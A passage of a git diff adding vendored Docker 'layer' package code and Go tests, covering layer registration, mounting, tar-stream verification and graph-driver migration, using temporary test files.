t.Fatal(err) + } + + return ls, td, func() { + graphcleanup() + os.RemoveAll(td) + } +} + +type layerInit func(root string) error + +func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { + containerID := stringid.GenerateRandomID() + mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil) + if err != nil { + return nil, err + } + + path, err := mount.Mount("") + if err != nil { + return nil, err + } + + if err := layerFunc(path); err != nil { + return nil, err + } + + ts, err := mount.TarStream() + if err != nil { + return nil, err + } + defer ts.Close() + + layer, err := ls.Register(ts, parent) + if err != nil { + return nil, err + } + + if err := mount.Unmount(); err != nil { + return nil, err + } + + if _, err := ls.ReleaseRWLayer(mount); err != nil { + return nil, err + } + + return layer, nil +} + +type FileApplier interface { + ApplyFile(root string) error +} + +type testFile struct { + name string + content []byte + permission os.FileMode +} + +func newTestFile(name string, content []byte, perm os.FileMode) FileApplier { + return &testFile{ + name: name, + content: content, + permission: perm, + } +} + +func (tf *testFile) ApplyFile(root string) error { + fullPath := filepath.Join(root, tf.name) + if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil { + return err + } + // Check if already exists + if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { + if err := os.Chmod(fullPath, tf.permission); err != nil { + return err + } + } + if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil { + return err + } + return nil +} + +func initWithFiles(files ...FileApplier) layerInit { + return func(root string) error { + for _, f := range files { + if err := f.ApplyFile(root); err != nil { + return err + } + } + return nil + } +} + +func getCachedLayer(l Layer) *roLayer { + if rl, ok := l.(*referencedCacheLayer); ok { + return rl.roLayer + } + return l.(*roLayer) +} + +func getMountLayer(l RWLayer) *mountedLayer { + return l.(*referencedRWLayer).mountedLayer +} + +func createMetadata(layers ...Layer) []Metadata { + metadata := make([]Metadata, len(layers)) + for i := range layers { + size, err := layers[i].Size() + if err != nil { + panic(err) + } + + metadata[i].ChainID = layers[i].ChainID() + metadata[i].DiffID = layers[i].DiffID() + metadata[i].Size = size + metadata[i].DiffSize = getCachedLayer(layers[i]).size + } + + return metadata +} + +func assertMetadata(t *testing.T, metadata, expectedMetadata []Metadata) { + if len(metadata) != len(expectedMetadata) { + t.Fatalf("Unexpected number of deletes %d, expected %d", len(metadata), len(expectedMetadata)) + } + + for i := range metadata { + if metadata[i] != expectedMetadata[i] { + t.Errorf("Unexpected metadata\n\tExpected: %#v\n\tActual: %#v", expectedMetadata[i], metadata[i]) + } + } + if t.Failed() { + t.FailNow() + } +} + +func releaseAndCheckDeleted(t *testing.T, ls Store, layer Layer, removed ...Layer) { + layerCount := len(ls.(*layerStore).layerMap) + expectedMetadata := createMetadata(removed...) + metadata, err := ls.Release(layer) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, expectedMetadata) + + if expected := layerCount - len(removed); len(ls.(*layerStore).layerMap) != expected { + t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected) + } +} + +func cacheID(l Layer) string { + return getCachedLayer(l).cacheID +} + +func assertLayerEqual(t *testing.T, l1, l2 Layer) { + if l1.ChainID() != l2.ChainID() { + t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID()) + } + if l1.DiffID() != l2.DiffID() { + t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID()) + } + + size1, err := l1.Size() + if err != nil { + t.Fatal(err) + } + + size2, err := l2.Size() + if err != nil { + t.Fatal(err) + } + + if size1 != size2 { + t.Fatalf("Mismatched size: %d vs %d", size1, size2) + } + + if cacheID(l1) != cacheID(l2) { + t.Fatalf("Mismatched cache id: %s vs %s", cacheID(l1), cacheID(l2)) + } + + p1 := l1.Parent() + p2 := l2.Parent() + if p1 != nil && p2 != nil { + assertLayerEqual(t, p1, p2) + } else if p1 != nil || p2 != nil { + t.Fatalf("Mismatched parents: %v vs %v", p1, p2) + } +} + +func TestMountAndRegister(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + li := initWithFiles(newTestFile("testfile.txt", []byte("some test data"), 0644)) + layer, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + size, _ := layer.Size() + t.Logf("Layer size: %d", size) + + mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil) + if err != nil { + t.Fatal(err) + } + + path2, err := mount2.Mount("") + if err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + + if expected := "some test data"; string(b) != expected { + t.Fatalf("Wrong file data, expected %q, got %q", expected, string(b)) + } + + if err := mount2.Unmount(); err != nil { + t.Fatal(err) + } + + if _, err := ls.ReleaseRWLayer(mount2); err != nil { + t.Fatal(err) + } +} + +func TestLayerRelease(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 2 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + layer3a, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3a file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer3b, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3b file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + t.Logf("Layer1: %s", layer1.ChainID()) + t.Logf("Layer2: %s", layer2.ChainID()) + t.Logf("Layer3a: %s", layer3a.ChainID()) + t.Logf("Layer3b: %s", layer3b.ChainID()) + + if expected := 4; len(ls.(*layerStore).layerMap) != expected { + t.Fatalf("Unexpected number of layers %d, expected %d", len(ls.(*layerStore).layerMap), expected) + } + + releaseAndCheckDeleted(t, ls, layer3b, layer3b) + releaseAndCheckDeleted(t, ls, layer3a, layer3a, layer2, layer1) +} + +func TestStoreRestore(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("layer1.txt", []byte("layer 1 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("layer2.txt", []byte("layer 2 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + layer3, err := createLayer(ls, layer2.ChainID(), initWithFiles(newTestFile("layer3.txt", []byte("layer 3 file"), 0644))) + if err != nil { + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil) + if err != nil { + t.Fatal(err) + } + + path, err := m.Mount("") + if err != nil { + t.Fatal(err) + } + + if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil { + t.Fatal(err) + } + + if err := m.Unmount(); err != nil { + t.Fatal(err) + } + + ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver) + if err != nil { + t.Fatal(err) + } + + layer3b, err := ls2.Get(layer3.ChainID()) + if err != nil { + t.Fatal(err) + } + + assertLayerEqual(t, layer3b, layer3) + + // Create again with same name, should return error + if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil { + t.Fatal("Expected error creating mount with same name") + } else if err != ErrMountNameConflict { + t.Fatal(err) + } + + m2, err := ls2.GetRWLayer("some-mount_name") + if err != nil { + t.Fatal(err) + } + + if mountPath, err := m2.Mount(""); err != nil { + t.Fatal(err) + } else if path != mountPath { + t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } + + if mountPath, err := m2.Mount(""); err != nil { + t.Fatal(err) + } else if path != mountPath { + t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } + if err := m2.Unmount(); err != nil { + t.Fatal(err) + } + + b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt")) + if err != nil { + t.Fatal(err) + } + if expected := "nothing here"; string(b) != expected { + t.Fatalf("Unexpected content %q, expected %q", string(b), expected) + } + + if err := m2.Unmount(); err != nil { + t.Fatal(err) + } + + if metadata, err := ls2.ReleaseRWLayer(m2); err != nil { + t.Fatal(err) + } else if len(metadata) != 0 { + t.Fatalf("Unexpectedly deleted layers: %#v", metadata) + } + + if metadata, err := ls2.ReleaseRWLayer(m2); err != nil { + t.Fatal(err) + } else if len(metadata) != 0 { + t.Fatalf("Unexpectedly deleted layers: %#v", metadata) + } + + releaseAndCheckDeleted(t, ls2, layer3b, layer3, layer2, layer1) +} + +func TestTarStreamStability(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, _, cleanup := newTestStore(t) + defer cleanup() + + files1 := []FileApplier{ + newTestFile("/etc/hosts", []byte("mydomain 10.0.0.1"), 0644), + newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0644), + } + addedFile := newTestFile("/etc/shadow", []byte("root:::::::"), 0644) + files2 := []FileApplier{ + newTestFile("/etc/hosts", []byte("mydomain 10.0.0.2"), 0644), + newTestFile("/etc/profile", []byte("PATH=/usr/bin"), 0664), + newTestFile("/root/.bashrc", []byte("PATH=/usr/sbin:/usr/bin"), 0644), + } + + tar1, err := tarFromFiles(files1...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(files2...) + if err != nil { + t.Fatal(err) + } + + layer1, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + // hack layer to add file + p, err := ls.(*layerStore).driver.Get(layer1.(*referencedCacheLayer).cacheID, "") + if err != nil { + t.Fatal(err) + } + + if err := addedFile.ApplyFile(p); err != nil { + t.Fatal(err) + } + + if err := ls.(*layerStore).driver.Put(layer1.(*referencedCacheLayer).cacheID); err != nil { + t.Fatal(err) + } + + layer2, err := ls.Register(bytes.NewReader(tar2), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + id1 := layer1.ChainID() + t.Logf("Layer 1: %s", layer1.ChainID()) + t.Logf("Layer 2: %s", layer2.ChainID()) + + if _, err := ls.Release(layer1); err != nil { + t.Fatal(err) + } + + assertLayerDiff(t, tar2, layer2) + + layer1b, err := ls.Get(id1) + if err != nil { + t.Logf("Content of layer map: %#v", ls.(*layerStore).layerMap) + t.Fatal(err) + } + + if _, err := ls.Release(layer2); err != nil { + t.Fatal(err) + } + + assertLayerDiff(t, tar1, layer1b) + + if _, err := ls.Release(layer1b); err != nil { + t.Fatal(err) + } +} + +func assertLayerDiff(t *testing.T, expected []byte, layer Layer) { + expectedDigest := digest.FromBytes(expected) + + if digest.Digest(layer.DiffID()) != expectedDigest { + t.Fatalf("Mismatched diff id for %s, got %s, expected %s", layer.ChainID(), layer.DiffID(), expected) + } + + ts, err := layer.TarStream() + if err != nil { + t.Fatal(err) + } + defer ts.Close() + + actual, err := ioutil.ReadAll(ts) + if err != nil { + t.Fatal(err) + } + + if len(actual) != len(expected) { + logByteDiff(t, actual, expected) + t.Fatalf("Mismatched tar stream size for %s, got %d, expected %d", layer.ChainID(), len(actual), len(expected)) + } + + actualDigest := digest.FromBytes(actual) + + if actualDigest != expectedDigest { + logByteDiff(t, actual, expected) + t.Fatalf("Wrong digest of tar stream, got %s, expected %s", actualDigest, expectedDigest) + } +} + +const maxByteLog = 4 * 1024 + +func logByteDiff(t *testing.T, actual, expected []byte) { + d1, d2 := byteDiff(actual, expected) + if len(d1) == 0 && len(d2) == 0 { + return + } + + prefix := len(actual) - len(d1) + if len(d1) > maxByteLog || len(d2) > maxByteLog { + t.Logf("Byte diff after %d matching bytes", prefix) + } else { + t.Logf("Byte diff after %d matching bytes\nActual bytes after prefix:\n%x\nExpected bytes after prefix:\n%x", prefix, d1, d2) + } +} + +// byteDiff returns the differing bytes after the matching prefix +func byteDiff(b1, b2 []byte) ([]byte, []byte) { + i := 0 + for i < len(b1) && i < len(b2) { + if b1[i] != b2[i] { + break + } + i++ + } + + return b1[i:], b2[i:] +} + +func tarFromFiles(files ...FileApplier) ([]byte, error) { + td, err := ioutil.TempDir("", "tar-") + if err != nil { + return nil, err + } + defer os.RemoveAll(td) + + for _, f := range files { + if err := f.ApplyFile(td); err != nil { + return nil, err + } + } + + r, err := archive.Tar(td, archive.Uncompressed) + if err != nil { + return nil, err + } + + buf := bytes.NewBuffer(nil) + if _, err := io.Copy(buf, r); err != nil { + return nil, err + } + + return buf.Bytes(), nil +} + +// assertReferences asserts that all the references are to the same +// image and represent the full set of references to that image. +func assertReferences(t *testing.T, references ...Layer) { + if len(references) == 0 { + return + } + base := references[0].(*referencedCacheLayer).roLayer + seenReferences := map[Layer]struct{}{ + references[0]: {}, + } + for i := 1; i < len(references); i++ { + other := references[i].(*referencedCacheLayer).roLayer + if base != other { + t.Fatalf("Unexpected referenced cache layer %s, expecting %s", other.ChainID(), base.ChainID()) + } + if _, ok := base.references[references[i]]; !ok { + t.Fatalf("Reference not part of reference list: %v", references[i]) + } + if _, ok := seenReferences[references[i]]; ok { + t.Fatalf("Duplicated reference %v", references[i]) + } + } + if rc := len(base.references); rc != len(references) { + t.Fatalf("Unexpected number of references %d, expecting %d", rc, len(references)) + } +} + +func TestRegisterExistingLayer(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + baseFiles := []FileApplier{ + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layerFiles := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Root configuration"), 0644), + } + + li := initWithFiles(baseFiles...) + layer1, err := createLayer(ls, "", li) + if err != nil { + t.Fatal(err) + } + + tar1, err := tarFromFiles(layerFiles...) + if err != nil { + t.Fatal(err) + } + + layer2a, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.Register(bytes.NewReader(tar1), layer1.ChainID()) + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer2a, layer2b) +} + +func TestTarStreamVerification(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + ls, tmpdir, cleanup := newTestStore(t) + defer cleanup() + + files1 := []FileApplier{ + newTestFile("/foo", []byte("abc"), 0644), + newTestFile("/bar", []byte("def"), 0644), + } + files2 := []FileApplier{ + newTestFile("/foo", []byte("abc"), 0644), + newTestFile("/bar", []byte("def"), 0600), // different perm + } + + tar1, err := tarFromFiles(files1...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(files2...) + if err != nil { + t.Fatal(err) + } + + layer1, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + layer2, err := ls.Register(bytes.NewReader(tar2), "") + if err != nil { + t.Fatal(err) + } + id1 := digest.Digest(layer1.ChainID()) + id2 := digest.Digest(layer2.ChainID()) + + // Replace tar data files + src, err := os.Open(filepath.Join(tmpdir, id1.Algorithm().String(), id1.Hex(), "tar-split.json.gz")) + if err != nil { + t.Fatal(err) + } + defer src.Close() + + dst, err := os.Create(filepath.Join(tmpdir, id2.Algorithm().String(), id2.Hex(), "tar-split.json.gz")) + if err != nil { + t.Fatal(err) + } + defer dst.Close() + + if _, err := io.Copy(dst, src); err != nil { + t.Fatal(err) + } + + src.Sync() + dst.Sync() + + ts, err := layer2.TarStream() + if err != nil { + t.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, ts) + if err == nil { + t.Fatal("expected data verification to fail") + } + if !strings.Contains(err.Error(), "could not verify layer data") { + t.Fatalf("wrong error returned from tarstream: %q", err) + } +} diff --git a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go new file mode 100644 index 0000000000..776b78ac02 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_unix.go @@ -0,0 +1,9 @@ +// +build linux freebsd darwin openbsd solaris + +package layer + +import "github.com/docker/docker/pkg/stringid" + +func (ls *layerStore) mountID(name string) string { + return stringid.GenerateRandomID() +} diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go new file mode 100644 index 0000000000..9aa1afd597 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go @@ -0,0 +1,71 @@ +// +build !windows + +package layer + +import "testing" + +func graphDiffSize(ls Store, l Layer) (int64, error) { + cl := getCachedLayer(l) + var parent string + if cl.parent != nil { + parent = cl.parent.cacheID + } + return ls.(*layerStore).driver.DiffSize(cl.cacheID, parent) +} + +// Unix as Windows graph driver does not support Changes which is indirectly +// invoked by calling DiffSize on the driver +func TestLayerSize(t *testing.T) { + ls, _, cleanup := newTestStore(t) + defer cleanup() + + content1 := []byte("Base contents") + content2 := []byte("Added contents") + + layer1, err := createLayer(ls, "", initWithFiles(newTestFile("file1", content1, 0644))) + if err != nil { + t.Fatal(err) + } + + layer2, err := createLayer(ls, layer1.ChainID(), initWithFiles(newTestFile("file2", content2, 0644))) + if err != nil { + t.Fatal(err) + } + + layer1DiffSize, err := graphDiffSize(ls, layer1) + if err != nil { + t.Fatal(err) + } + + if int(layer1DiffSize) != len(content1) { + t.Fatalf("Unexpected diff size %d, expected %d", layer1DiffSize, len(content1)) + } + + layer1Size, err := layer1.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content1); int(layer1Size) != expected { + t.Fatalf("Unexpected size %d, expected %d", layer1Size, expected) + } + + layer2DiffSize, err := graphDiffSize(ls, layer2) + if err != nil { + t.Fatal(err) + } + + if int(layer2DiffSize) != len(content2) { + t.Fatalf("Unexpected diff size %d, expected %d", layer2DiffSize, len(content2)) + } + + layer2Size, err := layer2.Size() + if err != nil { + t.Fatal(err) + } + + if expected := len(content1) + len(content2); int(layer2Size) != expected { + t.Fatalf("Unexpected size %d, expected %d", layer2Size, expected) + } + +} diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go new file mode 100644 index 0000000000..e20311a091 --- /dev/null +++ b/vendor/github.com/docker/docker/layer/layer_windows.go @@ -0,0 +1,98 @@ +package layer + +import ( + "errors" + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/daemon/graphdriver" +) + +// GetLayerPath returns the path to a layer +func GetLayerPath(s Store, layer ChainID) (string, error) { + ls, ok := s.(*layerStore) + if !ok { + return "", errors.New("unsupported layer store") + } + ls.layerL.Lock() + defer ls.layerL.Unlock() + + rl, ok := ls.layerMap[layer] + if !ok { + return "", ErrLayerDoesNotExist + } + + path, err := ls.driver.Get(rl.cacheID, "") + if err != nil { + return "", err + } + + if err := ls.driver.Put(rl.cacheID); err != nil { + return "", err + } + + return path, nil +} + +func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) { + var err error // this is used for cleanup in existingLayer case + diffID := digest.FromBytes([]byte(graphID)) + + // Create new roLayer + layer := &roLayer{ + cacheID: graphID, + diffID: DiffID(diffID), + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + size: size, + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + defer func() { + if err != nil { + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) + } + } + }() + + layer.chainID = createChainIDFromParent("", layer.diffID) + + if !ls.driver.Exists(layer.cacheID) { + return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID) + } + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +func (ls *layerStore) mountID(name string) string { + // windows has issues if container ID doesn't match mount ID + return name +} + +func (ls *layerStore) GraphDriver() graphdriver.Driver { + return ls.driver +} diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go new file mode 100644 index 0000000000..b45c31099d --- /dev/null +++ b/vendor/github.com/docker/docker/layer/migration.go @@ -0,0 +1,256 @@ +package layer + +import ( + "compress/gzip" + "errors" + "fmt" + "io" + "os" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +// CreateRWLayerByGraphID creates a RWLayer in the layer store using +// the provided name with the given graphID. To get the RWLayer +// after migration the layer may be retrieved by the given name. +func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) { + ls.mountL.Lock() + defer ls.mountL.Unlock() + m, ok := ls.mounts[name] + if ok { + if m.parent.chainID != parent { + return errors.New("name conflict, mismatched parent") + } + if m.mountID != graphID { + return errors.New("mount already exists") + } + + return nil + } + + if !ls.driver.Exists(graphID) { + return fmt.Errorf("graph ID does not exist: %q", graphID) + } + + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return ErrLayerDoesNotExist + } + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + // TODO: Ensure graphID has correct parent + + m = &mountedLayer{ + name: name, + parent: p, + mountID: graphID, + layerStore: ls, + references: map[RWLayer]*referencedRWLayer{}, + } + + // Check for existing init layer + initID := fmt.Sprintf("%s-init", graphID) + if ls.driver.Exists(initID) { + m.initID = initID + } + + if err = ls.saveMount(m); err != nil { + return err + } + + return nil +} + +func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) { + defer func() { + if err != nil { + logrus.Debugf("could not get checksum for %q with tar-split: %q", id, err) + diffID, size, err = ls.checksumForGraphIDNoTarsplit(id, parent, newTarDataPath) + } + }() + + if oldTarDataPath == "" { + err = errors.New("no tar-split file") + return + } + + tarDataFile, err := os.Open(oldTarDataPath) + if err != nil { + return + } + defer tarDataFile.Close() + uncompressed, err := gzip.NewReader(tarDataFile) + if err != nil { + return + } + + dgst := digest.Canonical.New() + err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash()) + if err != nil { + return + } + + diffID = DiffID(dgst.Digest()) + err = os.RemoveAll(newTarDataPath) + if err != nil { + return + } + err = os.Link(oldTarDataPath, newTarDataPath) + + return +} + +func (ls *layerStore) checksumForGraphIDNoTarsplit(id, parent, newTarDataPath string) (diffID DiffID, size int64, err error) { + rawarchive, err := ls.driver.Diff(id, parent) + if err != nil { + return + } + defer rawarchive.Close() + + f, err := os.Create(newTarDataPath) + if err != nil { + return + } + defer f.Close() + mfz := gzip.NewWriter(f) + defer mfz.Close() + metaPacker := storage.NewJSONPacker(mfz) + + packerCounter := &packSizeCounter{metaPacker, &size} + + archive, err := asm.NewInputTarStream(rawarchive, packerCounter, nil) + if err != nil { + return + } + dgst, err := digest.FromReader(archive) + if err != nil { + return + } + diffID = DiffID(dgst) + return +} + +func (ls *layerStore) RegisterByGraphID(graphID string, parent ChainID, diffID DiffID, tarDataFile string, size int64) (Layer, error) { + // err is used to hold the error which will always trigger + // cleanup of creates sources but may not be an error returned + // to the caller (already exists). + var err error + var p *roLayer + if string(parent) != "" { + p = ls.get(parent) + if p == nil { + return nil, ErrLayerDoesNotExist + } + + // Release parent chain if error + defer func() { + if err != nil { + ls.layerL.Lock() + ls.releaseLayer(p) + ls.layerL.Unlock() + } + }() + } + + // Create new roLayer + layer := &roLayer{ + parent: p, + cacheID: graphID, + referenceCount: 1, + layerStore: ls, + references: map[Layer]struct{}{}, + diffID: diffID, + size: size, + chainID: createChainIDFromParent(parent, diffID), + } + + ls.layerL.Lock() + defer ls.layerL.Unlock() + + if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { + // Set error for cleanup, but do not return + err = errors.New("layer already exists") + return existingLayer.getReference(), nil + } + + tx, err := ls.store.StartTransaction() + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + logrus.Debugf("Cleaning up transaction after failed migration for %s: %v", graphID, err) + if err := tx.Cancel(); err != nil { + logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) + } + } + }() + + tsw, err := tx.TarSplitWriter(false) + if err != nil { + return nil, err + } + defer tsw.Close() + tdf, err := os.Open(tarDataFile) + if err != nil { + return nil, err + } + defer tdf.Close() + _, err = io.Copy(tsw, tdf) + if err != nil { + return nil, err + } + + if err = storeLayer(tx, layer); err != nil { + return nil, err + } + + if err = tx.Commit(layer.chainID); err != nil { + return nil, err + } + + ls.layerMap[layer.chainID] = layer + + return layer.getReference(), nil +} + +type unpackSizeCounter struct { + unpacker storage.Unpacker + size *int64 +} + +func (u *unpackSizeCounter) Next() (*storage.Entry, error) { + e, err := u.unpacker.Next() + if err == nil && u.size != nil { + *u.size += e.Size + } + return e, err +} + +type packSizeCounter struct { + packer storage.Packer + size *int64 +} + +func (p *packSizeCounter) AddEntry(e storage.Entry) (int, error) { + n, err := p.packer.AddEntry(e) + if err == nil && p.size != nil { + *p.size += e.Size + } + return n, err +} diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go new file mode 100644 index 0000000000..07b4b68f8f --- /dev/null +++ b/vendor/github.com/docker/docker/layer/migration_test.go @@ -0,0 +1,435 @@ +package layer + +import ( + "bytes" + "compress/gzip" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" + "github.com/vbatts/tar-split/tar/asm" + "github.com/vbatts/tar-split/tar/storage" +) + +func writeTarSplitFile(name string, tarContent []byte) error { + f, err := os.OpenFile(name, os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + fz := gzip.NewWriter(f) + + metaPacker := storage.NewJSONPacker(fz) + defer fz.Close() + + rdr, err := asm.NewInputTarStream(bytes.NewReader(tarContent), metaPacker, nil) + if err != nil { + return err + } + + if _, err := io.Copy(ioutil.Discard, rdr); err != nil { + return err + } + + return nil +} + +func TestLayerMigration(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + td, err := ioutil.TempDir("", "migration-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(td) + + layer1Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Boring configuration"), 0644), + newTestFile("/etc/profile", []byte("# Base configuration"), 0644), + } + + layer2Files := []FileApplier{ + newTestFile("/root/.bashrc", []byte("# Updated configuration"), 0644), + } + + tar1, err := tarFromFiles(layer1Files...) + if err != nil { + t.Fatal(err) + } + + tar2, err := tarFromFiles(layer2Files...) + if err != nil { + t.Fatal(err) + } + + graph, err := newVFSGraphDriver(filepath.Join(td, "graphdriver-")) + if err != nil { + t.Fatal(err) + } + + graphID1 := stringid.GenerateRandomID() + if err := graph.Create(graphID1, "", nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(graphID1, "", bytes.NewReader(tar1)); err != nil { + t.Fatal(err) + } + + tf1 := filepath.Join(td, "tar1.json.gz") + if err := writeTarSplitFile(tf1, tar1); err != nil { + t.Fatal(err) + } + + fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) + if err != nil { + t.Fatal(err) + } + ls, err := NewStoreFromGraphDriver(fms, graph) + if err != nil { + t.Fatal(err) + } + + newTarDataPath := filepath.Join(td, ".migration-tardata") + diffID, size, err := ls.(*layerStore).ChecksumForGraphID(graphID1, "", tf1, newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer1a, err := ls.(*layerStore).RegisterByGraphID(graphID1, "", diffID, newTarDataPath, size) + if err != nil { + t.Fatal(err) + } + + layer1b, err := ls.Register(bytes.NewReader(tar1), "") + if err != nil { + t.Fatal(err) + } + + assertReferences(t, layer1a, layer1b) + // Attempt register, should be same + layer2a, err := ls.Register(bytes.NewReader(tar2), layer1a.ChainID()) + if err != nil { + t.Fatal(err) + } + + graphID2 := stringid.GenerateRandomID() + if err := graph.Create(graphID2, graphID1, nil); err != nil { + t.Fatal(err) + } + if _, err := graph.ApplyDiff(graphID2, graphID1, bytes.NewReader(tar2)); err != nil { + t.Fatal(err) + } + + tf2 := filepath.Join(td, "tar2.json.gz") + if err := writeTarSplitFile(tf2, tar2); err != nil { + t.Fatal(err) + } + diffID, size, err = ls.(*layerStore).ChecksumForGraphID(graphID2, graphID1, tf2, newTarDataPath) + if err != nil { + t.Fatal(err) + } + + layer2b, err := ls.(*layerStore).RegisterByGraphID(graphID2, layer1a.ChainID(), diffID, tf2, size) + if err != nil { + t.Fatal(err) + } + assertReferences(t, layer2a, layer2b) + + if metadata, err := ls.Release(layer2a); err != nil { + t.Fatal(err) + } else if len(metadata) > 0 { + t.Fatalf("Unexpected layer removal after first release: %#v", metadata) + } + + metadata, err := ls.Release(layer2b) + if err != nil { + t.Fatal(err) + } + + assertMetadata(t, metadata, createMetadata(layer2a)) +} + +func tarFromFilesInGraph(graph graphdriver.Driver, graphID, parentID string, files 